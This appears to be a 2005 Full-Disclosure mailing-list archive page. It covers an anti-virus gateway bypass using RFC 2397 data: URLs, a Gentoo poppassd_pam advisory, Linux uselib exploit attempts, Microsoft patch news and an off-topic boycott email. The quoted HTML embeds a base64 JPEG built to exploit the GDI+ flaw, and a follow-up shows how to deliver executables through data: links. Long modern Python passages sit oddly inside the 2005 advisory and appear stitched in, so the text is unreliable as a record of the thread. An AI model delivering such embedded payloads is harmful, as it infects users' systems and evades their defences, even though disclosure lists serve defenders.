<[EMAIL PROTECTED]> wrote:
> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
> 
> Multi-vendor AV gateway image inspection bypass vulnerability
> January 10, 2005
> 
> A vulnerability has been discovered which allows a remote attacker to
> bypass anti-virus (as well as other security technologies such as IDS
> and IPS) inspection of HTTP image content.
> 
> By leveraging techniques described in RFC 2397 for base64 encoding image
> content within the URL scheme, a remote attacker may encode a malicious
> image within the body of an HTML formatted document to circumvent
> content inspection.
> 
> For example:
> 
> http://www.k-otik.com/exploits/09222004.ms04-28-cmd.c.php
> 
> The source code at the URL above will by default create a JPEG image
> that will attempt (and fail without tweaking) to exploit the Microsoft
> MS04-028 GDI+ vulnerability. The image itself is detected by all AV
> gateway engines tested (Trend, Sophos and McAfee); however, when the
> same image is base64 encoded using the technique described in RFC 2397
> (documented below), inspection is not performed and the image is
> delivered and rendered by the client.
> 
> While Microsoft Internet Explorer does not support the RFC 2397 URL
> scheme, Firefox, Safari, Mozilla and Opera do and will render the data
> and thus successfully execute the payload if the necessary OS and/or
> application patches have not been applied.
> 
> ## BEGIN HTML ##
> 
> 
> 
> 
> 
> 
> ## END HTML ##
> 
> Solution:
> 
> While AV vendor patches are not yet available, fixes for all currently
> known image vulnerabilities are
> and have been for several months.  If you have not yet applied them,
> you have your own
> negligence to blame.
> 
> Contributions:
> 
> Thanks to Scott Roeder and Jacinto Rodriquez for their assistance in
> platform testing.

I believe TrendMicro's OfficeScan (client-server scanner) will catch
it, but I am not sure about their gateway device. What was their
response?

...D
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] PoC to be released on 01/20/05

2005-01-11 Thread Exibar



I'm going to spend double what I usually spend that day, and maybe buy a
big screen TV just to piss people like you off.

This is not the list for that crap, take it somewhere else...

  - Original Message - 
  From: Some User
  To: full-disclosure@lists.netsys.com
  Sent: Monday, January 10, 2005 9:13 PM
  Subject: [Full-Disclosure] PoC to be released on 01/20/05

  
  This is a PoC by the people! Be sure to do your part. :-)
   
  Not One Damn Dime Day - Jan 20, 2005
  Since our religious leaders will not speak out against the war in 
  Iraq, since our political leaders don't have the moral courage to oppose it, 
  Inauguration Day, Thursday, January 20th, 2005 is "Not One Damn Dime Day" in 
  America.
   
  On "Not One Damn Dime Day" those who oppose what is happening in our name 
  in Iraq can speak up with a 24-hour national boycott of all forms of consumer 
  spending.
   
  During "Not One Damn Dime Day" please don't spend money. No one damn dime 
  for gasoline. Not one damn dime for necessities or for impulse purchases. Not 
  one damn dime for nothing for 24 hours.
   
  On "Not One Damn Dime Day," please boycott Wal-Mart, Kmart and 
  Target.
   
  Please don't go to the mall or the local convenience store. Please don't 
  buy any fast food (or any groceries at all for that matter).
   
  For 24 hours, please do what you can to shut the retail economy 
  down.
   
  The object is simple. Remind the people in power that the war in Iraq is 
  immoral and illegal; that they are responsible for starting it and that it is 
  their responsibility to stop it.
   
  "Not One Damn Dime Day" is to remind them, too, that they work for the 
  people of the United States of America, not for the international corporations 
  and K Street lobbyists who represent the corporations and funnel cash into 
  American politics.
   
  "Not One Damn Dime Day" is about supporting the troops. The politicians 
  put the troops in harm's way.
  Now 1,200 brave young Americans and (some estimate) 100,000 Iraqis have 
  died. The politicians owe our troops a plan - a way to come home.
   
  There's no rally to attend. No marching to do. No left or right wing 
  agenda to rant about. On "Not One Damn Dime Day" you take action by doing 
  nothing.
   
  You open your mouth by keeping your wallet closed.
   
  For 24 hours, nothing gets spent, not one damn dime, to remind our 
  religious leaders and our politicians of their moral responsibility to end the 
  war in Iraq and give America back to the people.
   
  ==> Please share this email. <==
  Original sent by:
  James Wong
  Marsteller Interactive
  
  
  
  

  ___
  Full-Disclosure - We believe in it.
  Charter: http://lists.netsys.com/full-disclosure-charter.html
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] I thought Microsoft were releasing new security patches today (11 Jan 2005)?

2005-01-11 Thread KF (lists)
Ok folks, the damn sky IS NOT falling.
I just checked my SUS install and I have 10 new updates... so should you.
So let's all just FREAK [EMAIL PROTECTED]@#
-KF
Micheal Espinola Jr wrote:
> Nope, it's typically the 2nd Tuesday of the month. Also, they are
> PST.  Myself being EST, I don't expect to see anything until
> mid-afternoon.
> 
> MS did pre-announce that there would be a release today.  You can
> verify this on the web site.
> 
> On Tue, 11 Jan 2005 17:11:17 +0100, Vincent Archer <[EMAIL PROTECTED]> wrote:
> 
> > On Tue, Jan 11, 2005 at 03:13:45PM -, Mike Diack wrote:
> > 
> > > Where are they?
> > > Mike
> > 
> > Thursday usually, not tuesday?
> > 
> > --
> > Vincent ARCHER
> > [EMAIL PROTECTED]
> > 
> > Tel : +33 (0)1 40 07 47 14
> > Fax : +33 (0)1 40 07 47 27
> > Deny All - 5, rue Scribe - 75009 Paris - France
> > www.denyall.com
> > 
> > ___
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.netsys.com/full-disclosure-charter.html


 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Microsoft AntiSpyware: Will it be free and Vulnerable

2005-01-11 Thread Dan Margolis
On Tue, Jan 11, 2005 at 06:51:16PM +0100, devis wrote:
> Buahwuahwuahwuawa ... you have to be gullible to think that M$ will not 
> NOT cash on their own slack coding.  

I'm confused. Are you saying that "slack coding" by Microsoft is
responsible for spyware/adware? Seems a bit of an odd interpretation.
Here's mine:

- It's very, very difficult to prevent people from voluntarily
  installing spyware on their own systems. There's no way to write a
  heuristic that can distinguish between an application that accesses
  the 'net on a regular basis for spying and one that does so for, say,
  monitoring a buddy list or checking for mail. 

- You can certainly whitelist applications, but this would prevent
  users from being able to install obscure shareware apps, custom apps,
  etc. 

- Were MS to restrict access to their API in order to prevent spyware
  makers from doing obscure tricks with the registry and whatnot, they'd
  be accused, quite rightly, of anti-competitive tactics. 

Certainly some spyware results from poor restriction of web controls or
something--I don't know the details, as I don't even use Windows--but
I'd bet you the vast majority comes from users installing stuff they
shouldn't--Kazaa, Snood, whatever--or from users clicking "OK" on banner
ads that promise to speed your Internet connection. 

Much of the same goes for e-mail worms: so long as a user has permission
to execute untrusted code and so long as that user has permission to
send code to other people, he is easy prey for e-mail-borne worms. 

So, here's the question: does most spyware exploit some actual bug or
design flaw? Or does it just use the user's gullibility? I suspect the
latter. 

Flame on. 
--
Dan
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


[Full-Disclosure] FW: New Security Patches from Microsoft

2005-01-11 Thread Todd Towles
No IE patch, it would seem.

> -Original Message-
> From: Eric Schultze [mailto:[EMAIL PROTECTED]
> Sent: Tuesday, January 11, 2005 12:09 PM
> To: Patch Management Mailing List
> Subject: New Security Patches from Microsoft
> 
> Three new security bulletins have been released
> 
> 
> MS05-001 (Critical)
> Vulnerability in HTML Help Could Allow Code Execution (890175) 
> http://www.microsoft.com/technet/security/Bulletin/MS05-001.mspx
> 
> MS05-002 (Critical)
> Vulnerability in Cursor and Icon Format Handling Could Allow 
> Remote Code Execution (891711) 
> http://www.microsoft.com/technet/security/Bulletin/MS05-002.mspx
> 
> MS05-003 (Important)
> Vulnerability in the Indexing Service Could Allow Remote Code 
> Execution
> (871250)
> http://www.microsoft.com/technet/security/Bulletin/MS05-003.mspx
> 
> 
> 
> Happy Testing
> 
> Eric
> 
> 
> 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


RE: [Full-Disclosure] FW: New Security Patches from Microsoft

2005-01-11 Thread Larry Seltzer
>>No IE patch, it would seem.

No, but...

> MS05-001 (Critical)
> Vulnerability in HTML Help Could Allow Code Execution (890175) 
> http://www.microsoft.com/technet/security/Bulletin/MS05-001.mspx
> 
> MS05-002 (Critical)
> Vulnerability in Cursor and Icon Format Handling Could Allow Remote 
> Code Execution (891711) 
> http://www.microsoft.com/technet/security/Bulletin/MS05-002.mspx
> 

Both of these address problems that have been exploited through IE.
These are the ones that have gotten so much recent publicity.

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


[Full-Disclosure] [ GLSA 200501-22 ] poppassd_pam: Unauthorized password changing

2005-01-11 Thread Thierry Carrez
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200501-22
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
     Title: poppassd_pam: Unauthorized password changing
      Date: January 11, 2005
      Bugs: #75820
        ID: 200501-22

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

poppassd_pam allows anyone to change any user's password without
authenticating the user first.

Background
==========

poppassd_pam is a PAM-enabled server for changing system passwords that
can be used to change POP server passwords.

Affected packages
=================

    -------------------------------------------------------------------
     Package                      /  Vulnerable  /         Unaffected
    -------------------------------------------------------------------
     net-mail/poppassd_ceti            <= 1.0                >= 1.8.4
     net-mail/poppassd_pam             <= 1.0             Vulnerable!
    -------------------------------------------------------------------

Description
===========

Gentoo Linux developer Marcus Hanwell discovered that poppassd_pam did
not check that the old password was valid before changing passwords.
Our investigation revealed that poppassd_pam did not call
pam_authenticate before calling pam_chauthtok.
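
The missing call order (pam_authenticate, then pam_chauthtok) is easiest to see as code. As an added example that is not the poppassd_pam or poppassd_ceti source, the Python below drives a poppassd-style "user / pass / newpass" session against a vulnerable and a fixed change policy; a dict stands in for PAM, and the reply strings are constructed for the example.

```python
"""Added example, not the poppassd_pam or poppassd_ceti source: a poppassd-style
'user / pass / newpass' dialogue driven against two password-change policies.
A dict stands in for the system password database; authenticate() plays the
role of pam_authenticate and chauthtok() the role of pam_chauthtok."""
import hmac


def make_store() -> dict:
    """Constructed credential store; real poppassd asks PAM instead."""
    return {"alice": "old-secret", "root": "r00t"}


def authenticate(store: dict, user: str, password: str) -> bool:
    """pam_authenticate stand-in: does the caller know the current password?"""
    stored = store.get(user)
    return stored is not None and hmac.compare_digest(
        stored.encode(), password.encode())


def chauthtok(store: dict, user: str, new_password: str) -> None:
    """pam_chauthtok stand-in. Like the real call made by a root-running daemon,
    it trusts its caller and changes the token unconditionally."""
    store[user] = new_password


def vulnerable_change(store: dict, user: str, old: str, new: str) -> bool:
    """poppassd_pam as the GLSA describes it: straight to chauthtok, the
    supplied old password is never verified."""
    chauthtok(store, user, new)
    return True


def fixed_change(store: dict, user: str, old: str, new: str) -> bool:
    """Authenticate first; change the password only for a caller who proved
    they know the current one."""
    if not authenticate(store, user, old):
        return False
    chauthtok(store, user, new)
    return True


def poppassd_session(store: dict, client_lines, change_password) -> list:
    """Run one poppassd-style session and return the server's reply lines.
    change_password(store, user, old, new) -> bool is the policy under test."""
    user = old = None
    replies = ["200 poppassd ready"]
    for line in client_lines:
        verb, _, arg = line.strip().partition(" ")
        verb = verb.lower()
        if verb == "user":
            user, old = arg, None
            replies.append("200 your password please")
        elif verb == "pass":
            old = arg
            replies.append("200 your new password please")
        elif verb == "newpass":
            if user is None or old is None:
                replies.append("500 out of sequence")
            elif change_password(store, user, old, arg):
                replies.append("200 password changed, thank-you")
            else:
                replies.append("500 old password is incorrect")
        elif verb == "quit":
            replies.append("200 bye")
            break
        else:
            replies.append("500 unknown command")
    return replies


# Constructed transcript: a wrong old password for root, then a new one.
WRONG_OLD_PASSWORD = ["user root", "pass guess", "newpass new-pw", "quit"]

if __name__ == "__main__":
    for policy in (vulnerable_change, fixed_change):
        store = make_store()
        poppassd_session(store, WRONG_OLD_PASSWORD, policy)
        print(f"{policy.__name__}: root password is now {store['root']!r}")
```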

Impact
======

A remote attacker could change the system password of any user,
including root. This leads to a complete compromise of the POP
accounts, and may also lead to a complete root compromise of the
affected server, if it also provides shell access authenticated using
system passwords.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All poppassd_pam users should migrate to the new package called
poppassd_ceti:

# emerge --sync
# emerge --ask --oneshot --verbose ">=net-mail/poppassd_ceti-1.8.4"

Note: Portage will automatically replace the poppassd_pam package by
the poppassd_ceti package.

References
==========

  [ 1 ] CAN-2005-0002
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0002

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200501-22.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2005 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0



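The root cause in the Description above is an ordering bug rather than a memory-safety one: pam_chauthtok asks the PAM stack to set a new authentication token, and typical stacks do not challenge a root-privileged caller such as a password-changing daemon for the old password, so pam_authenticate (and pam_acct_mgmt) must run first. The following Python model is an added example, not code from poppassd_pam or poppassd_ceti. It stands PAM in with a constructed in-memory account store (salted PBKDF2 hashes) so it runs offline, and places the vulnerable session logic beside the corrected one. The user/pass/newpass command names follow the poppassd convention; the reply strings are an assumption of this example.

```python
import hashlib
import secrets
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple


@dataclass
class AccountStore:
    """Constructed stand-in for the system password database that a real
    poppassd reaches through PAM. Passwords are stored as salted PBKDF2."""
    _hashes: Dict[str, Tuple[bytes, bytes]] = field(default_factory=dict)

    @staticmethod
    def _derive(password: str, salt: bytes) -> bytes:
        return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 50_000)

    def set_password(self, user: str, password: str) -> None:
        salt = secrets.token_bytes(16)
        self._hashes[user] = (salt, self._derive(password, salt))

    def check(self, user: str, password: str) -> bool:
        if user not in self._hashes:
            return False
        salt, digest = self._hashes[user]
        return secrets.compare_digest(digest, self._derive(password, salt))


class PasswordChangeSession:
    """One poppassd-style session (commands: user, pass, newpass, quit).

    require_auth=False reproduces the poppassd_pam flaw: the 'pass' step is
    accepted without being checked, i.e. pam_chauthtok with no preceding
    pam_authenticate. require_auth=True is the corrected ordering."""

    def __init__(self, store: AccountStore, require_auth: bool = True) -> None:
        self.store = store
        self.require_auth = require_auth
        self.user: Optional[str] = None
        self.authenticated = False

    def command(self, line: str) -> str:
        verb, _, arg = line.strip().partition(" ")
        verb = verb.lower()
        if verb == "user":
            self.user, self.authenticated = arg, False
            return "200 your password please"
        if verb == "pass":
            if self.user is None:
                return "500 send user first"
            # Corrected path: verify the old password (pam_authenticate,
            # then pam_acct_mgmt) before anything else is allowed.
            if self.require_auth and not self.store.check(self.user, arg):
                self.authenticated = False
                return "500 authentication failed"
            # The vulnerable path reaches here for any value of arg.
            self.authenticated = True
            return "200 your new password please"
        if verb == "newpass":
            if not self.authenticated:
                return "500 authenticate first"
            self.store.set_password(self.user, arg)  # the pam_chauthtok step
            return "200 password changed"
        if verb == "quit":
            return "200 bye"
        return "500 unknown command"


def run_session(store: AccountStore, require_auth: bool,
                user: str, old: str, new: str) -> List[str]:
    """Drive one full exchange and return the server's replies."""
    session = PasswordChangeSession(store, require_auth)
    return [session.command(c) for c in
            (f"user {user}", f"pass {old}", f"newpass {new}", "quit")]


def demo() -> Dict[bool, Tuple[List[str], bool]]:
    """An attacker supplies a wrong old password for root against both
    variants; returns the replies and whether root's password changed."""
    results = {}
    for require_auth in (False, True):
        store = AccountStore()
        store.set_password("root", "correct horse battery staple")
        replies = run_session(store, require_auth, "root", "wrong guess", "owned")
        results[require_auth] = (replies, store.check("root", "owned"))
    return results


if __name__ == "__main__":
    for variant, (replies, changed) in demo().items():
        print("require_auth=%s changed=%s %s" % (variant, changed, replies))
```

With require_auth=False the session changes root's password although the old password was wrong, which is the advisory's impact in miniature; with require_auth=True the same exchange stops at the pass step. The same rule applies to any privileged password-changing front end, whether it talks to PAM or not: the credential check and the credential change are separate operations, and the second must be gated on the first within the same session.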


RE: [Full-Disclosure] Multi-vendor AV gateway image inspection bypass vulnerability

2005-01-11 Thread Mark Senior
Trend Micro OfficeScan client (version 6.5, virus definitions from 10
Jan 2005) didn't catch it in my case.

I copied the html section from the original message straight to a text
file and scanned that.  I suppose it's possible some text wrapping
munged the original posting.

Cheers
Mark


-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Danny
Sent: January 11, 2005 12:14
To: Darren Bounds
Cc: [EMAIL PROTECTED]; [EMAIL PROTECTED];
bugtraq@securityfocus.com; [EMAIL PROTECTED];
full-disclosure@lists.netsys.com
Subject: Re: [Full-Disclosure] Multi-vendor AV gateway image inspection
bypassvulnerability

On Mon, 10 Jan 2005 14:08:11 -0500, Darren Bounds
<[EMAIL PROTECTED]> wrote:
> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
> 
> Multi-vendor AV gateway image inspection bypass vulnerability January 
> 10, 2005
> 
> A vulnerability has been discovered which allows a remote attacker to 
> bypass anti-virus (as well other security technologies such as IDS and
> IPS) inspection of HTTP image content.
> 
> By leveraging techniques described in RFC 2397 for base64 encoding 
> image content within the URL scheme. A remote attack may encode a 
> malicious image within the body of an HTML formatted document to 
> circumvent content inspection.
> 
> For example:
> 
> http://www.k-otik.com/exploits/09222004.ms04-28-cmd.c.php
> 
> The source code at the URL above will by default create a JPEG image 
> that will attempt (and fail without tweaking) to exploit the Microsoft
> MS04-028 GDI+ vulnerability.
> The image itself is detected
> by all AV gateway engines tested (Trend, Sophos and McAfee), however, 
> when the same image is base64 encoded using the technique described in
> RFC 2397 (documented below), inspection is not performed and is 
> delivered rendered by the client.
> 
> While Microsoft Internet Explorer does not support the RFC 2397 URL 
> scheme; Firefox, Safari, Mozilla and Opera do and will render the data
> and thus successfully execute the payload if the necessary OS and/or 
> application patches have not been applied.
> 
> ## BEGIN HTML ##
> 
> 
> 
>  src="data:image/gif;base64,/9j/4AAQSkZJRgABAQEAYABgAAD//
> gAARXhpZgAASUkqAAgAHPD9f0FBQUGWAgAAGgAAABzw
> /X9BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> FB 
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> FB 
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> FB 
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> FB 
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> FB 
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> FB 
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> FB 
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> FB 
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> FB 
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> FB 
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> FB 
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> FB 
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> FB 
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> FB 
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> FB 
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> FB 
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> FB 
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> FB 
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQQAAAP/bAEMACAYGBwYFCAcHBw
> kJ 
> CAoMFA0MCwsMGRITDxQdGh8eHRocHCAkLicgIiwjHBwoNyksMDE0NDQfJzk9ODI8LjM0Mv
> /b 
> AEMBCQkJDAsMGA0NGDIhHCEyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj
> Iy 
> MjIyMjIyMjIyMjIyMv/AABEIAAMAAwMBIgACEQEDEQH/xAAfAAABBQEBAQEBAQ
> AA 
> AQIDBAUGBwgJCgv/xAC1EAACAQMDAgQDBQUEBX0BAgMABBEFEiExQQYTUWEHInEUMo
> GR 
> oQgjQrHBFVLR8CQzYnKCCQoWFxgZGiUmJygpKjQ1Njc4OTpDREVGR0hJSlNUVVZXWFlaY2
> Rl 
> ZmdoaWpzdHV2d3h5eoOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExc
> bH
> yMnK0tPU1dbX2Nna4eLj5OXm5+jp6vHy8/T19vf4+fr/xAAfAQADAQEBAQEBAQEBAA
> yMnK0tPU1dbX2Nna4eLj5OXm5+AA
> AQIDBAUGBwgJCgv/xAC1EQACAQIEBAMEBwUEBAABAncAAQIDEQQFITEGEkFRB2FxEyIygQ
> gU 
> QpGhscEJIzNS8BVictEKFiQ04SXxFxgZGiYnKCkqNTY3ODk6Q0RFRkdISUpTVFVWV1hZWm
> Nk 
> ZWZnaGlqc3R1dnd4eXqCg4SFhoeIiYqSk5SVlpeYmZqio6Slpqeoqaqys7S1tre4ubrCw8
> TF
> xsfIycrS09TV1tfY2dri4+Tl5ufo6ery8/T19vf4+fr/2gAMAwEAAhEDEQA/APn+iiigD/
> xsfIycrS09TV1tfY2dri4+/
> Z">
> 
> 
> 
> ## END HTML ##
> 
> Solution:
> 
> While AV vendor patches are not yet available, fixes for all currently
> known image vulnerabilities are and have been for several months.  If 
> you have not yet applied them, you have your own negligence to blame.
> 
> Contributions:
> 
> Thanks to Scott Roeder and Jacinto Rodriquez their as

[Full-Disclosure] Re: Firespoofing [Firefox 1.0]

2005-01-11 Thread Pavel Kankovsky
On Tue, 11 Jan 2005, mikx wrote:

> The bug is confirmed but currently unfixed (open for more than 3 months). As 
> a partial workaround set dom.disable_window_flip to true in about:config. 

Setting most of dom.disable_window_open_feature.* to true (and making it
impossible to remove browser "decorations" from browser windows) is a
pretty efficient (even if not 100% bullet-proof) way to thwart this kind
of attack. As well as other GUI spoofing attacks.

--Pavel Kankovsky aka Peak  [ Boycott Microsoft--http://www.vcnet.com/bms ]
"Resistance is futile. Open your source code and prepare for assimilation."



RE: [Full-Disclosure] FW: New Security Patches from Microsoft

2005-01-11 Thread Todd Towles
Agreed, I spoke a bit too fast. Peter Kruse e-mailed me directly and
stated the same. Thanks for pointing that out.

> -Original Message-
> From: Larry Seltzer [mailto:[EMAIL PROTECTED] 
> Sent: Tuesday, January 11, 2005 2:04 PM
> To: Todd Towles; 'Mailing List - Full-Disclosure'
> Subject: RE: [Full-Disclosure] FW: New Security Patches from Microsoft
> 
> >>No IE patch, it would seem.
> 
> No, but...
> 
> > MS05-001 (Critical) Vulnerability in the Indexing Service Could Allow 
> > Remote Code Execution (871250) Vulnerability in HTML Help Could Allow 
> > Code Execution (890175) 
> > http://www.microsoft.com/technet/security/Bulletin/MS05-001.mspx
> > 
> > MS05-002 (Critical)
> > Vulnerability in Cursor and Icon Format Handling Could Allow Remote 
> > Code Execution (891711) 
> > http://www.microsoft.com/technet/security/Bulletin/MS05-002.mspx
> > 
> 
> Both of these address problems that have been exploited through IE.
> These are the ones that have gotten so much recent publicity.
> 
> 



Re: [Full-Disclosure] Microsoft AntiSpyware: Will it be free and Vulnerable

2005-01-11 Thread devis
Dan Margolis wrote:
On Tue, Jan 11, 2005 at 06:51:16PM +0100, devis wrote:

> Buahwuahwuahwuawa ... you have to be gullible to think that M$ will not 
> NOT cash on their own slack coding.  

I'm confused. Are you saying that "slack coding" by Microsoft is
responsible for spyware/adware? Seems a bit of an odd interpretation.
Here's mine:
- It's very, very difficult to prevent people from voluntarily
 installing spyware on their own systems. There's no way to write a
 heuristic that can distinguish between an application that accesses
 the 'net on a regular basis for spying and one that does so for, say,
 monitoring a buddy list or checking for mail. 

- You can certainly whitelist applications, but this would prevent
 users from being able to install obscure shareware apps, custom apps,
 etc. 

- Were MS to restrict access to their API in order to prevent spyware
 makers from doing obscure tricks with the registry and whatnot, they'd
 be accused, quite rightly, of anti-competitive tactics. 

Certainly some spyware results from poor restriction of web controls or
something--I don't know the details, as I don't even use Windows--but
I'd bet you the vast majority comes from users installing stuff they
shouldn't--Kazaa, Snood, whatever--or from users clicking "OK" on banner
ads that promise to speed your Internet connection. 

Much of the same goes for e-mail worms: so long as a user has permission
to execute untrusted code and so long as that user has permission to
send code to other people, he is easy prey for e-mail-borne worms. 

So, here's the question: does most spyware exploit some actual bug or
design flaw? Or does it just use the user's gullibility? I suspect the
latter. 

Flame on. 
--
Dan

It is a proven matter that spyware does exploit IE holes (iframe bugs, 
ActiveX etc. etc.). Do your work on a few and you will see. Besides, you 
missed the point entirely: if a user, just by clicking, can install 
spyware on his machine, then the OS / browser is to blame, not the 
actual (bad) code (exploiting it) floating around websites.
Once again, you are missing the point completely: if M$ didn't 'slack 
code' their OS, spyware would:
1) not install
2) therefore not exist in the form, numbers and variety we know them

I'll give you a clue:
try to get a 'tool bar' or some 'other added bonus' automagically on 
bsd/unix/linux/solaris using any browser, on any site, clicking randomly.
As you said,
'It's very, very difficult to prevent people from voluntarily installing 
spyware on their own systems.' Yes indeed, because MS made it so that the 
average joe is an admin and therefore has supreme powers out of the box.
Usability costs security. Always has, always will.

No Flames, Just information.


[Full-Disclosure] Re: I thought Microsoft were releasing new security patches today (11 Jan 2005)?

2005-01-11 Thread steve menard
Matt Ostiguy wrote:
> On Tue, 11 Jan 2005 15:13:45 -, Mike Diack <[EMAIL PROTECTED]> wrote:
>> Where are they?
>> Mike
>
> My experience has been that the 2nd tuesday of the month patch drop
> occurs late in the day or evening, Eastern Standard Time.
> Matt

I just got 3 for windows 2000 server
through Auto updates not there last week  ;-0


Re: [Full-Disclosure] Linux kernel uselib() privilege elevation, corrected

2005-01-11 Thread steve menard
Gaz Wilson wrote:
> On Tue, 11 Jan 2005, Athanasius wrote:
>> On Tue, Jan 11, 2005 at 07:56:32AM +, Marcy Darcy wrote:
>>> I'm running a small server with the 2.6.10 kernel.
>>> The exploit doesn't seem to be working on this kernel. Is there a way
>>> to make sure the system is vulnerable or not?
>>
>> I couldn't get the exploit to work for 2.6.10 either.  First there's
>> changing a struct in it to user_desc to make it compile, then it just
>> SEGVs all the time here.
>
> I get it compiled and running on 2.6.8, but it doesn't do anything, other
> than hog all available CPU for about 10-15 minutes followed by:
> [-] FAILED: try again (-f switch) and again (Cannot allocate memory)
> Killed
> The same thing happens with the -f switch, except the process gets stopped
> (SIGSTOP) instead of killed after the allotted time.


My RedHat 8.0 system won't give up id 0,
although I do have a semi-permanent DoS on my hands right now with
./exploit -n5
;-) since 4 hours ago ;-{
I expect I just don't have the command line correct,
although it may [doubtful] be Bastille settings.
steve


[Full-Disclosure] Using data: URLs for malware injection

2005-01-11 Thread Michael Holzt

Using data: URL for malware injection

2005/01/11, Michael Holzt, kju -at- fqdn.org
based on work done by Darren Bounds (see text)



As described by Darren Bounds in an earlier posting [1], RFC 2397 allows
embedding data in an HTML formatted document. While Darren only used this
for malicious images, I did some further research which shows that this
can also be used to embed an executable file in the document. As shown by
Darren, such embedded data is not detected by current AV gateways. This
could be abused by websites (and probably HTML email too) for distributing 
malware.

The attack works by using a URL scheme like this:

   <a href="data:application/x-msdos-program;base64,[base64 data]">Click me!</a>

I've made an example available which embeds putty.exe. The example is about
500 kByte HTML and is available on http://kju.de/misc/putty.html. Please do
not spread this URL outside of this list because of the traffic. Feel free
to copy the example to your own webspace.

My tests with various Windows-based web browsers had the following results:

  - IE6             clicking on the link does nothing

  - Mozilla 1.5.4   will try to open the "what should I do with that"
                    file dialog and then hangs; needs to be killed.

  - Firefox 1.0     allows saving of the data to hard disk
                    (on Linux it will also display much rubbish
                    in the save dialog)

  - Opera 7.5.4     tells you that it will open the file with Notepad
                    (which sounds OK), but will then EXECUTE IT
                    INSTEAD (without further warning).

The behaviour of Opera 7.5.4 seems like a major security bug to me. Can
someone else confirm this behaviour?


References:

[1] Posting by Darren Bounds on 2005/01/10,
<[EMAIL PROTECTED]> 
http://lists.netsys.com/pipermail/full-disclosure/2005-January/030724.html


[Full-Disclosure] MORE CRITICAL FLAWS IN MS WINDOWS EXPLORER

2005-01-11 Thread Team Pwnge
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
TEAM PWN4GE Security Advisory PWNED
